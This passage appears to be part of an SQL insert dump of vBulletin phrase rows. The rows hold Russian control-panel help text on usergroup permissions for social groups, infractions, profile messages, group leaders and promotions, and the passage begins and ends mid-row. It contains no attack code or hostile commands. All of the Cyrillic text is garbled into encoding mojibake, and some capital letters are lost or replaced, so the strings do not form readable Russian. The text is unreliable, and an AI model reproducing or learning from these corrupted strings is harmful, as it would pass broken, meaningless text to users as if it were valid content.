\r\nÅñëè ãðóïïà íå èìååò ó÷àñòíèêîâ, êðîìå îñíîâàòåëÿ, òî îñíîâàòåëü ñìîæåò îòðåäàêòèðîâàòü ýòè äàííûå, âíå çàâèñèìîñòè îò äàííîãî ïàðàìåòðà.', 'vbulletin', 'zCarot', 1211885079, '3.7.1'), (24755, -1, 'usergroup_add_edit_caneditowngroups_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ñâîè ñîöèàëüíûå ãðóïïû', 'vbulletin', 'zCarot', 1195740541, '3.7.0 Beta 1'), (24756, -1, 'usergroup_add_edit_candeleteowngroups_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò óäàëÿòü ñâîè ñîöèàëüíûå ãðóïïû.', 'vbulletin', 'zCarot', 1195740607, '3.7.0 Beta 1'), (24757, -1, 'usergroup_add_edit_candeleteowngroups_title', 'cphelptext', 'Ìîæåò óäàëÿòü ñâîè ñîöèàëüíûå ãðóïïû', 'vbulletin', 'zCarot', 1195740607, '3.7.0 Beta 1'), (24758, -1, 'usergroup_add_edit_canviewgroups_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ïðîñìàòðèâàòü ñîöèàëüíûå ãðóïïû', 'vbulletin', 'zCarot', 1195740638, '3.7.0 Beta 1'), (24759, -1, 'usergroup_add_edit_canviewgroups_title', 'cphelptext', 'Ìîæåò ïðîñìàòðèâàòü ñîöèàëüíûå ãðóïïû', 'vbulletin', 'zCarot', 1195740760, '3.7.0 Beta 1'), (24760, -1, 'usergroup_add_edit_canmanagemessages_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò óïðàâëÿòü ñâîèìè ñîîáùåíèÿìè â ñîöèàëüíûõ ãðóïïàõ', 'vbulletin', 'zCarot', 1195740878, '3.7.0 Beta 1'), (24761, -1, 'usergroup_add_edit_canmanagemessages_title', 'cphelptext', 'Ìîæåò óïðàâëÿòü ñîîáùåíèÿìè â ñâîèõ ñîöèàëüíûõ ãðóïïàõ', 'vbulletin', 'zCarot', 1195740878, '3.7.0 Beta 1'), (24762, -1, 'usergroup_add_edit_canpostnonmembergroup_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò îòïðàâëÿòü ñîîáùåíèÿ â ãðóïïû, ó÷àñòíèêîì êîòîðûõ íå ÿâëÿåòñÿ.', 'vbulletin', 'zCarot', 1195740925, '3.7.0 Beta 1'), (24763, -1, 'usergroup_add_edit_canpostnonmembergroup_title', 'cphelptext', 'Ìîæåò îñòàâëÿòü ñîîáùåíèÿ â ãðóïïàõ, â êîòîðûõ íå ñîñòîèò', 'vbulletin', 'zCarot', 1195740925, '3.7.0 Beta 1'), (24764, -1, 'usergroup_add_edit_canmanageowngroups_text', 'cphelptext', 'Ãàçðåøàÿ ïîëüçîâàòåëþ óïðàâëÿòü ñâîèìè ñîöèàëüíûìè ãðóïïàìè, âû òåì ñàìûì äà¸òå ïðàâà íà ñëåäóþùåå:\r\n
    \r\n
  • Çàïðåùåíèå ñîîáùåíèé
  • \r\n
  • Îäîáðåíèå ñîîáùåíèé
  • \r\n
  • Ìÿãêîå óäàëåíèå ñîîáùåíèé
  • \r\n
  • Óäàëåíèå èçîáðàæåíèé èç ãðóïïû (èçîáðàæåíèÿ âñ¸ åù¸ îñòàíóòñÿ â àëüáîìàõ èõ àâòîðîâ)
  • \r\n
  • Ëèøåíèå ÷ëåíñòâà ïîëüçîâàòåëÿ â ãðóïïå
  • \r\n
\r\nÅñëè â îñíîâíûõ íàñòðîéêàõ ðàçðåøåíà ïðèíóäèòåëüíàÿ ïðîâåðêà ñîîáùåíèé ãðóïï, òî â äîïîëíåíèå ê âûøåñêàçàííîìó, ïîëüçîâàòåëè ñìîãóò ñîçäàâàòü ãðóïïû, ãäå ñîîáùåíèÿ, ïåðåä ïóáëè÷íûì îòîáðàæåíèåì, áóäóò ïðîâåðÿòüñÿ îñíîâàòåëåì ãðóïïû èëè àäìèíèñòðàöèåé ôîðóìà.
\r\n
\r\nÂíå çàâèñèìîñòè îò äàííîãî ðàçðåøåíèÿ, ïîëüçîâàòåëè ñìîãóò ñàìîñòîÿòåëüíî óïðàâëÿòü çàÿâêàìè íà âñòóïëåíèÿ â ãðóïïó, à òàêæå îòïðàâëÿòü ïðèãëàøåíèÿ íà âñòóïëåíèå.', 'vbulletin', 'zCarot', 1205427073, '3.7.0 Release Candidate 1'), (24765, -1, 'usergroup_add_edit_canmanageowngroups_title', 'cphelptext', 'Ìîæåò óïðàâëÿòü ñâîèìè ñîöèàëüíûìè ãðóïïàìè', 'vbulletin', 'zCarot', 1205427073, '3.7.0 Release Candidate 1'), (24766, -1, 'usergroup_addleader_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå äîáàâèòü íîâîãî ëèäåðà îäíîé èç ãðóïï ïîëüçîâàòåëåé. Âûáåðèòå ãðóïïó íèæå è ââåäèòå òî÷íîå èìÿ ïîëüçîâàòåëÿ, êîòîðîãî õîòèòå íàçíà÷èòü ëèäåðîì, çàòåì íàæìèòå \"Äîáàâèòü\" äëÿ ïðîäîëæåíèÿ.
\r\n
Ëèäåðû ïîëüçîâàòåëüñêèõ ãðóïï ìîãóò ïîäòâåðæäàòü çàÿâêè íà âñòóïëåíèå â èõ ãðóïïó â ñåêöèè Ãðóïïû ïîëüçîâàòåëåé â ñâî¸ì êàáèíåòå.', 'vbulletin', '', 0, ''), (24767, -1, 'usergroup_addleader_title', 'cphelptext', 'Äîáàâèòü íîâîãî ëèäåðà ãðóïïû', 'vbulletin', '', 0, ''), (24768, -1, 'usergroup_addleader_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâàòåëåé, ê êîòîðîé âû õîòèòå äîáàâèòü ëèäåðà.', 'vbulletin', '', 0, ''), (24769, -1, 'usergroup_addleader_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24770, -1, 'usergroup_addleader_username_text', 'cphelptext', 'Ââåäèòå òî÷íîå èìÿ ïîëüçîâàòåëÿ, êîòîðîãî âû õîòèòå ñäåëàòü ëèäåðîì ýòîé ãðóïïû.', 'vbulletin', '', 0, ''), (24771, -1, 'usergroup_addleader_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''), (24772, -1, 'usergroup_edit_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì ðåäàêòèðîâàòü ðàçðåøåíèÿ è íàñòðîéêè äëÿ ýòîé ãðóïïû ïîëüçîâàòåëåé. Ñìîòðèòå ñïðàâêó íèæå åñëè òðåáóþòñÿ îñîáûå íàñòðîéêè ïðàâ äîñòóïà.', 'vbulletin', '', 0, ''), (24773, -1, 'usergroup_edit_title', 'cphelptext', 'Ãåäàêòèðîâàòü ãðóïïó', 'vbulletin', '', 0, ''), (24774, -1, 'usergroup_edit_add_canalwayscreatediscussion_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò íà÷èíàòü íîâûå äèñêóññèè â ãðóïïàõ, äàæå åñëè:\r\n
    \r\n
  • Ãîëüçîâàòåëü íå ÿâëÿåòñÿ ó÷àñòíèêîì ãðóïïû.
  • \r\n
  •  ãðóïïå âêëþ÷åíà îïöèÿ \"Ãîëüçîâàòåëè äîëæíû âñòóïèòü â ãðóïïó, ÷òîáû ïðîñìàòðèâàòü å¸\".
  • \r\n
  •  ãðóïïå âêëþ÷åíà îïöèÿ \"Òîëüêî óïðàâëÿþùèé ìîæåò íà÷èíàòü íîâûå äèñêóññèè\".
  • \r\n
\r\n\r\nÃîìíèòå: Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ïðîñìàòðèâàòü ãðóïïû, äàæå åñëè îíè íàñòðîåíû ñ âêëþ÷åííûì ïàðàìåòðàìè \"Òîëüêî äëÿ ñâîèõ\" è \"Ãîëüçîâàòåëè äîëæíû âñòóïèòü â ãðóïïó, ÷òîáû ïðîñìàòðèâàòü å¸\".', 'vbulletin', 'zCarot', 1225812813, '3.8.0 Beta 2'), (24775, -1, 'usergroup_edit_add_canalwayscreatediscussion_title', 'cphelptext', 'Âñåãäà ìîæåò ñîçäàâàòü äèñêóññèè â ñîöèàëüíûõ ãðóïïàõ', 'vbulletin', 'zCarot', 1211992891, '3.7.1'), (24776, -1, 'usergroup_edit_add_canalwayspostmessage_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü âñåãäà ñìîæåò îòïðàâëÿòü íîâûå ñîîáùåíèÿ â ñîöèàëüíûõ ãðóïïàõ, äàæå åñëè:\r\n\r\n
    \r\n
  • Âêëþ÷åíà îïöèÿ \"Ãîëüçîâàòåëè äîëæíû âñòóïèòü â ãðóïïó, ÷òîáû ïðîñìàòðèâàòü å¸\".
  • \r\n
  • Ãîëüçîâàòåëü íå ÿâëÿåòñÿ ó÷àñòíèêîì ýòîé ãðóïïû.
  • \r\n
\r\n\r\nÃîìíèòå: Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ïðîñìàòðèâàòü ãðóïïû, äàæå åñëè îíè íàñòðîåíû ñ âêëþ÷åííûì ïàðàìåòðàìè \"Òîëüêî äëÿ ñâîèõ\" è \"Ãîëüçîâàòåëè äîëæíû âñòóïèòü â ãðóïïó, ÷òîáû ïðîñìàòðèâàòü å¸\".', 'vbulletin', 'zCarot', 1225812938, '3.8.0 Beta 2'), (24777, -1, 'usergroup_edit_add_canalwayspostmessage_title', 'cphelptext', 'Âñåãäà ìîæåò îòâå÷àòü â ñîöèàëüíûõ ãðóïïàõ', 'vbulletin', 'zCarot', 1211992802, '3.7.1'), (24778, -1, 'usergroup_edit_add_cananimategroupicon_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü, êîòîðûé ìîæåò çàãðóæàòü èêîíêè ñîöèàëüíûõ ãðóïï, ñìîæåò çàãðóæàòü è àíèìèðîâàííûé gif â êà÷åñòâå èêîíêè.', 'vbulletin', 'zCarot', 1216130125, '3.8.0 Alpha 1'), (24779, -1, 'usergroup_edit_add_cananimategroupicon_title', 'cphelptext', 'Ìîæåò çàãðóæàòü àíèìèðîâàííûå èêîíêè ãðóïï', 'vbulletin', 'zCarot', 1216130125, '3.8.0 Alpha 1'), (24780, -1, 'usergroup_edit_add_cancreatediscussion_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò íà÷èíàòü íîâûå äèñêóññèè â òåõ ãðóïïàõ, ãäå ýòî íå çàïðåùåíî.', 'vbulletin', 'zCarot', 1210937940, '3.7.1'), (24781, -1, 'usergroup_edit_add_cancreatediscussion_title', 'cphelptext', 'Ìîæåò ñîçäàâàòü íîâûå äèñêóññèè â ãðóïïàõ', 'vbulletin', 'zCarot', 1210937940, '3.7.1'), (24782, -1, 'usergroup_edit_add_caneditprivacy_text', 'cphelptext', 'Äà¸ò âîçìîæíîñòü ïîëüçîâàòåëþ îãðàíè÷èòü äîñòóï ê íåêîòîðûì áëîêàì è êàòåãîðèÿì èõ ïðîôèëÿ îò äðóãèõ ïîëüçîâàòåëåé, òàêèõ êàê: ïîëüçîâàòåëè â èõ ñïèñêå èãíîðèðîâàíèÿ; ãîñòè; ïîëüçîâàòåëè, íå íàõîäÿùèåñÿ â èõ ñïèñêå çíàêîìûõ; ïîëüçîâàòåëè, íå íàõîäÿùèåñÿ â èõ ñïèñêå äðóçåé.

\r\nÃîìíèòå: Åñëè ýòî âêëþ÷åíî, òî äëÿ íàñòðîéêè îãðàíè÷åíèé ïîëüçîâàòåëþ ñëåäóåò èñïîëüçîâàòü ðàçäåë \"Êîíôèäåíöèàëüíîñòü\" â ñâî¸ì êàáèíåòå.', 'vbulletin', 'zCarot', 1218464861, '3.8.0 Alpha 1'), (24783, -1, 'usergroup_edit_add_caneditprivacy_title', 'cphelptext', 'Ìîæåò îãðàíè÷èâàòü äîñòóï ê ïðîôèëþ', 'vbulletin', 'zCarot', 1218465604, '3.8.0 Alpha 1'), (24786, -1, 'usergroup_edit_add_cangiveinfraction_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè ýòîé ãðóïïû âûäàâàòü íàðóøåíèÿ äðóãèì ïîëüçîâàòåëÿì. Åñëè ýòà îïöèÿ âêëþ÷åíà, òî ïîëüçîâàòåëè òàêæå ñìîãóò âèäåòü èíôîðìàöèþ î íàðóøåíèÿõ äðóãèõ ïîëüçîâàòåëåé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24787, -1, 'usergroup_edit_add_cangiveinfraction_title', 'cphelptext', 'Ìîæåò äåëàòü çàïèñè î íàðóøåíèÿõ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24788, -1, 'usergroup_edit_add_canlimitdiscussion_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëè ñìîãóò íàñòðîèòü ñâîè ñîöèàëüíûå ãðóïïû òàê, ÷òî òîëüêî îíè ñìîãóò íà÷èíàòü íîâûå äèñêóññèè. Ãòà îïöèÿ çàâèñèò îò òîãî, âêëþ÷åíà ëè ñîîòâåòñòâóþùàÿ îïöèÿ â îñíîâíûõ íàñòðîéêàõ (\"Äàòü âîçìîæíîñòü óïðàâëÿþùèì çàïðåòèòü ñîçäàíèå íîâûõ äèñêóññèé\").', 'vbulletin', 'zCarot', 1210938154, '3.7.1'), (24789, -1, 'usergroup_edit_add_canlimitdiscussion_title', 'cphelptext', 'Ìîæåò çàïðåòèòü ñîçäàíèå äèñêóññèé', 'vbulletin', 'zCarot', 1210938154, '3.7.1'), (24790, -1, 'usergroup_edit_add_canmanagediscussions_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò óïðàâëÿòü äèñêóññèÿìè, êîòîðûå îí íà÷àë. Åñëè \"Ãåò\", òî ïîëüçîâàòåëü íå ñìîæåò óäàëèòü ñâîè äèñêóññèè, åñëè â íèõ óæå êòî-ëèáî îòâåòèë.', 'vbulletin', 'zCarot', 1212053344, '3.7.1'), (24791, -1, 'usergroup_edit_add_canmanagediscussions_title', 'cphelptext', 'Ìîæåò óïðàâëÿòü ñâîèìè äèñêóññèÿìè â ñîöèàëüíûõ ãðóïïàõ', 'vbulletin', 'zCarot', 1212053344, '3.7.1'), (24792, -1, 'usergroup_edit_add_canpostmessage_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò îñòàâëÿòü íîâûå ñîîáùåíèÿ â ñîöèàëüíûõ ãðóïïàõ. ×òîáû îòâå÷àòü â äèñêóññèÿõ òðåáóåòñÿ ïðàâî íà ñîçäàíèå íîâûõ äèñêóññèé.', 'vbulletin', 'zCarot', 1210937879, '3.7.1'), (24793, -1, 'usergroup_edit_add_canpostmessage_title', 'cphelptext', 'Ìîæåò îñòàâëÿòü ñîîáùåíèÿ â ãðóïïàõ', 'vbulletin', 'zCarot', 1210937879, '3.7.1'), (24794, -1, 'usergroup_edit_add_canreverseinfraction_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè ýòîé ãðóïïû ñíèìàòü àêòèâíûå èëè èñò¸êøèå íàðóøåíèÿ. Ãòà îïöèÿ òàêæå ïîçâîëÿåò ïðîñìîòðåòü äåòàëüíóþ èíôîðìàöèþ î íàðóøåíèÿõ, òàê êàê ÷òîáû ñíÿòü íàðóøåíèå, íóæíî ïðîñìîòðåòü åãî.', 'vbulletin', 'zCarot', 1153746203, '3.6.0 Release Candidate 3'), (24795, -1, 'usergroup_edit_add_canreverseinfraction_title', 'cphelptext', 'Ìîæåò ñíèìàòü íàðóøåíèÿ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24796, -1, 'usergroup_edit_add_canseeinfraction_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû âèäåòü óðîâåíü íàðóøåíèé ïîëüçîâàòåëåé. Ãòà îïöèÿ íå ïðåäóñìàòðèâàåò ïðîñìîòð ïðè÷èí íàðóøåíèé èëè êîììåíòàðèåâ. Ãîëüçîâàòåëè äîëæíû èìåòü ïðàâà äåëàòü çàïèñè î íàðóøåíèÿõ, ÷òîáû ïðîñìîòðåòü ïîäðîáíóþ èíôîðìàöèþ î íèõ.', 'vbulletin', 'zCarot', 1150106793, '3.6.0 Beta 2'), (24797, -1, 'usergroup_edit_add_canseeinfraction_title', 'cphelptext', 'Ìîæåò âèäåòü óðîâåíü íàðóøåíèé äðóãèõ ïîëüçîâàòåëåé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24798, -1, 'usergroup_edit_add_canseethumbnails_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò âèäåòü ìèíèàòþðû ïðèêðåïë¸ííûõ èçîáðàæåíèé ê ñîîáùåíèÿì â òåìàõ, äàæå åñëè ó íåãî íåò ïðàâ íà ñêà÷èâàíèå âëîæåíèé.', 'vbulletin', 'zCarot', 1219764597, '3.8.0 Alpha 1'), (24799, -1, 'usergroup_edit_add_canseethumbnails_title', 'cphelptext', 'Ìîæåò âèäåòü ìèíèàòþðû', 'vbulletin', 'zCarot', 1219764597, '3.8.0 Alpha 1'), (24800, -1, 'usergroup_edit_add_canuploadgroupicon_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò çàãðóæàòü èêîíêè ñîöèàëüíûì ãðóïïàì, êîòîðûìè óïðàâëÿåò.', 'vbulletin', 'zCarot', 1224674885, '3.8.0 Beta 2'), (24801, -1, 'usergroup_edit_add_canuploadgroupicon_title', 'cphelptext', 'Ìîæåò çàãðóæàòü èêîíêè ñîöèàëüíûõ ãðóïï', 'vbulletin', 'zCarot', 1216130033, '3.8.0 Alpha 1'), (24802, -1, 'usergroup_edit_add_groupiconmaxsize_text', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð ôàéëà èêîíêè ñîöèàëüíûõ ãðóïï (â áàéòàõ).

\r\n\r\nÃîìíèòå: Âñå èêîíêè ñîöèàëüíûõ ãðóïï îãðàíè÷åíû ïî ðàçìåðó èçîáðàæåíèÿ (ìàêñèìàëüíî 200õ200 ïèêñåëåé).', 'vbulletin', 'Jelsoft', 1224675066, '3.8.0 Beta 2'), (24803, -1, 'usergroup_edit_add_groupiconmaxsize_title', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð ôàéëà èêîíêè ñîöèàëüíûõ ãðóïï (â áàéòàõ) ', 'vbulletin', 'zCarot', 1216130294, '3.8.0 Alpha 1'), (24804, -1, 'usergroup_edit_add_maximumsocialgroups_text', 'cphelptext', 'Ãòîò ïàðàìåòð ïîçâîëÿåò âàì îãðàíè÷èòü êîëè÷åñòâî ñîöèàëüíûõ ãðóïï, êîòîðûìè ìîæåò îäíîâðåìåííî óïðàâëÿòü ïîëüçîâàòåëü. Åñëè ïîëüçîâàòåëü äîñòèãíåò ïðåäåëà, òî åìó áóäåò ïðåäëîæåíî óäàëèòü îäíó èç ñóùåñòâóþùèõ ãðóïï.

\r\nÅñëè óêàçàòü 0, òî îãðàíè÷åíèÿ áóäóò ñíÿòû.', 'vbulletin', 'zCarot', 1218710074, '3.8.0 Alpha 1'), (24805, -1, 'usergroup_edit_add_maximumsocialgroups_title', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî ãðóïï', 'vbulletin', 'zCarot', 1218710074, '3.8.0 Alpha 1'), (24806, -1, 'usergroup_edit_add_pmthrottlequantity_text', 'cphelptext', 'Óêàæèòå ìàêñèìàëüíîå êîëè÷åñòâî ëè÷íûõ ñîîáùåíèé, êîòîðûå ñìîæåò îòïðàâèòü ïîëüçîâàòåëü çà ïåðèîä âðåìåííîãî îãðàíè÷åíèÿ, êîòîðûé óêàçàí â îñíîâíûõ íàñòðîéêàõ.
\r\nÅñëè óêàçàòü 0, òî îãðàíè÷åíèÿ áóäóò ñíÿòû.', 'vbulletin', 'zCarot', 1216395202, '3.8.0 Alpha 1'), (24807, -1, 'usergroup_edit_add_pmthrottlequantity_title', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåíèé äëÿ âðåìåííîãî îãðàíè÷åíèÿ', 'vbulletin', 'zCarot', 1216395146, '3.8.0 Alpha 1'), (24808, -1, 'usergroup_edit_add_requirehvcheck_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëè ýòîé ãðóïïû áóäóò ïðîõîäèòü ïðîâåðêó, îòäåëÿþùóþ ëþäåé îò ðîáîòîâ, âî âðåìÿ âûïîëíåíèÿ äåéñòâèé, óêàçàííûõ â îñíîâíûõ íàñòðîéêàõ.', 'vbulletin', 'zCarot', 1216640146, '3.8.0 Alpha 1'), (24809, -1, 'usergroup_edit_add_requirehvcheck_title', 'cphelptext', 'Îòäåëÿòü ëþäåé îò ðîáîòîâ ïðè âûïîëíåíèè îïðåäåë¸ííûõ äåéñòâèé', 'vbulletin', 'zCarot', 1216640146, '3.8.0 Alpha 1'), (24810, -1, 'usergroup_edit_add_canmanageownprofile_text', 'cphelptext', 'Îïðåäåëÿåò, ìîæåò ëè ïîëüçîâàòåëü óïðàâëÿòü ïóáëè÷íûìè ñîîáùåíèÿìè, êîòîðûå íàõîäÿòñÿ â åãî ïðîôèëå. Ãîä óïðàâëåíèåì ïîíèìàåòñÿ ïðîâåðêà, ðåäàêòèðîâàíèå è ìÿãêîå óäàëåíèå òàêèõ ñîîáùåíèé.', 'vbulletin', 'zCarot', 1197373222, '3.7.0 Beta 1'), (24811, -1, 'usergroup_edit_add_canmanageownprofile_title', 'cphelptext', 'Ìîæåò óïðàâëÿòü ïóáëè÷íûìè ñîîáùåíèÿìè â ñâî¸ì ïðîôèëå', 'vbulletin', 'zCarot', 1192049894, '3.7.0 Beta 1'), (24812, -1, 'usergroup_edit_add_canmessageownprofile_text', 'cphelptext', 'Îïðåäåëÿåò, ìîæåò ëè ïîëüçîâàòåëü ðàçìåùàòü ïóáëè÷íûå ñîîáùåíèå â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1197373159, '3.7.0 Beta 1'), (24813, -1, 'usergroup_edit_add_canmessageownprofile_title', 'cphelptext', 'Ìîæåò îñòàâëÿòü ïóáëè÷íûå ñîîáùåíèÿ â ñâî¸ì ïðîôèëå', 'vbulletin', 'zCarot', 1197373202, '3.7.0 Beta 1'), (24814, -1, 'usergroup_edit_add_canmessageothersprofile_text', 'cphelptext', 'Îïðåäåëÿåò, ìîæåò ëè ïîëüçîâàòåëü ðàçìåùàòü ïóáëè÷íûå ñîîáùåíèå â ÷óæèõ ïðîôèëÿõ.', 'vbulletin', 'zCarot', 1197373232, '3.7.0 Beta 1'), (24815, -1, 'usergroup_edit_add_canmessageothersprofile_title', 'cphelptext', 'Ìîæåò îñòàâëÿòü ïóáëè÷íûå ñîîáùåíèÿ â ÷óæèõ ïðîôèëÿõ', 'vbulletin', 'zCarot', 1197373239, '3.7.0 Beta 1'), (24816, -1, 'usergroup_edit_add_caneditownmessages_text', 'cphelptext', 'Îïðåäåëÿåò, ìîæåò ëè ïîëüçîâàòåëü ðåäàêòèðîâàòü ñâîè ïóáëè÷íûå ñîîáùåíèÿ, íàõîäÿùèåñÿ êàê â ñâî¸ì, òàê è â ÷óæèõ ïðîôèëÿõ.

Îòíåñèòåñü âíèìàòåëüíî ê ïîõîæåìó ïðàâó - Ìîæåò óïðàâëÿòü ïóáëè÷íûìè ñîîáùåíèÿìè â ñâî¸ì ïðîôèëå, êîòîðîå ïðè ðàçðåøåíèè äàñò âîçìîæíîñòü ðåäàêòèðîâàòü ñâîè ïóáëè÷íûå ñîîáùåíèÿ, åñëè îíè áóäóò íàõîäèòüñÿ â ïðîôèëå åãî àâòîðà.', 'vbulletin', 'zCarot', 1204246428, '3.7.0 Beta 6'), (24817, -1, 'usergroup_edit_add_caneditownmessages_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ñâîè ïóáëè÷íûå ñîîáùåíèÿ', 'vbulletin', 'zCarot', 1197373214, '3.7.0 Beta 1'), (24818, -1, 'usergroup_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå óïðàâëÿòü ïðåäóñòàíîâëåííûìè, äîïîëíèòåëüíûìè è ïóáëè÷íûìè ãðóïïàìè ïîëüçîâàòåëåé.
\r\n
Ãðåäóñòàíîâëåííûå ãðóïïû - ýòî òå, êîòîðûå ñîçäàþòñÿ ïðè óñòàíîâêå ôîðóìà. Äîïîëíèòåëüíûå - ýòî ñîçäàííûå âàìè ãðóïïû. Ãóáëè÷íûå - ýòî ãðóïïû, â êîòîðûå ìîãóò âñòóïàòü ïîëüçîâàòåëè, ïîñëàâ çàÿâêó íà âñòóïëåíèå (åñëè äëÿ ýòèõ ãðóïï âêëþ÷åíà îïöèÿ \"Ãóáëè÷íàÿ ãðóïïà\").
\r\n
Êîëîíêà Îñíîâíûå ïîëüçîâàòåëè îòîáðàæàåò êîëè÷åñòâî ïîëüçîâàòåëåé, äëÿ êîòîðûõ äàííàÿ ãðóïïà ÿâëÿåòñÿ îñíîâíîé. Êîëîíêà Äîïîëíèò. ïîëüçîâàòåëè îòîáðàæàåò êîëè÷åñòâî ïîëüçîâàòåëåé, äëÿ êîòîðûõ ýòà ãðóïïà ÿâëÿåòñÿ äîïîëíèòåëüíîé.  êîëîíêå Óïðàâëåíèå ðàñïîëàãàåòñÿ ìåíþ ñ âîçìîæíûìè îïöèÿìè äëÿ óïðàâëåíèÿ êàæäîé ãðóïïîé.
\r\n
 ðàçäåëå Ãóáëè÷íûå ãðóïïû åñòü äâà äîïîëíèòåëüíûõ ñòîëáöà:
\r\nÇàÿâêè íà âñòóïëåíèå - îòîáðàæàåò êîëè÷åñòâî îæèäàþùèõ îäîáðåíèÿ/îòêëîíåíèÿ çàÿâîê íà âñòóïëåíèå â äàííóþ ãðóïïó ïîëüçîâàòåëåé (ïîëüçîâàòåëè ìîãóò ïîñëàòü çàÿâêó íà âñòóïëåíèå â ãðóïïó, åñëè äëÿ íå¸ âêëþ÷åíà îïöèÿ \"Ãóáëè÷íàÿ ãðóïïà\").
\r\nËèäåð ãðóïïû - îòîáðàæàåò òåêóùèõ ëèäåðîâ ãðóïïû. Âû ìîæåòå óäàëèòü ñóùåñòâóþùåãî ëèäåðà ãðóïïû íàæàâ íà \"Óäàëèòü\". ×òîáû äîáàâèòü íîâîãî ëèäåðà ãðóïïû âûáåðèòå îïöèþ \"Äîáàâèòü ëèäåðà ãðóïïû\" èç ìåíþ ñïðàâà.', 'vbulletin', '', 0, ''), (24819, -1, 'usergroup_modify_title', 'cphelptext', 'Óïðàâëåíèå ãðóïïàìè ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24820, -1, 'usergroup_modifypromotion_text', 'cphelptext', 'Ãèæå îòîáðàæåí ñïèñîê òåêóùèõ ïîâûøåíèé (åñëè îíè îïðåäåëåíû). Ãîâûøåíèÿ ìîãóò èñïîëüçîâàòüñÿ äëÿ óïðàâëåíèÿ ïðàâàìè äîñòóïà è äðóãèìè íàñòðîéêàìè ãðóïïû, îñíîâûâàÿñü íà ðåïóòàöèè ïîëüçîâàòåëåé, ñðîêà äàâíîñòè èõ ðåãèñòðàöèè è êîëè÷åñòâå îïóáëèêîâàííûõ ñîîáùåíèé.
\r\n
Ãîâûøåíèÿ íà ýòîé ñòðàíèöå ñãðóïïèðîâàíû ïî ãðóïïàì ïîëüçîâàòåëåé, ê êîòîðûì îíè ïðèìåíÿþòñÿ. Çàãîëîâêè ãðóïï âî âñþ øèðèíó ñòðàíèöû îòîáðàæàþò, äëÿ êàêîé èç ãðóïï äàííîå ïîâûøåíèå. Ãîä íèìè ðàñïîëîæåíû êîëîíêè ñ èíôîðìàöèåé î òåêóùèõ íàñòðîéêàõ êàæäîãî ïîâûøåíèÿ. Ãðóïïà ïîëüçîâàòåëåé îòîáðàæàåò ãðóïïó, äî êîòîðîé ïîëüçîâàòåëü áóäåò ïîâûøåí (ïîíèæåí). Ñïîñîá ïîâûøåíèÿ îòîáðàæàåò, áóäåò ëè èçìåíåíà îñíîâíàÿ ãðóïïà ïîëüçîâàòåëÿ â ñëó÷àå ïîâûøåíèÿ, ëèáî ïîëüçîâàòåëü áóäåò äîïîëíèòåëüíî äîáàâëåí â íîâóþ ãðóïïó. Ñòðàòåãèÿ ïîâûøåíèÿ ïîêàçûâàåò, êàêèå èç ñëåäóþùèõ òð¸õ óñëîâèé äîëæíû áûòü âûïîëíåíû, ÷òîáû ïîâûøåíèå ñîñòîÿëîñü.', 'vbulletin', '', 0, ''), (24821, -1, 'usergroup_modifypromotion_title', 'cphelptext', 'Ãîâûøåíèÿ', 'vbulletin', '', 0, ''), (24822, -1, 'usergroup_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåíèå óäàëåíèÿ óêàçàííîé ãðóïïû. Ãðîâåðüòå ïðàâèëüíîñòü èìåíè óäàëÿåìîé ãðóïïû è íàæìèòå \"Äà\" äëÿ óäàëåíèÿ. Ãòà îïåðàöèÿ íåîáðàòèìà.', 'vbulletin', '', 0, ''), (24823, -1, 'usergroup_remove_title', 'cphelptext', 'Óäàëèòü ãðóïïó', 'vbulletin', '', 0, ''), (24824, -1, 'usergroup_removeleader_text', 'cphelptext', 'Ãòî ïîäòâåðæäåíèå óäàëåíèÿ ëèäåðà óêàçàííîé ãðóïïû. Ãðîâåðüòå ïðàâèëüíîñòü èìåíè ïîëüçîâàòåëÿ íèæå è íàæìèòå \"Äà\" äëÿ 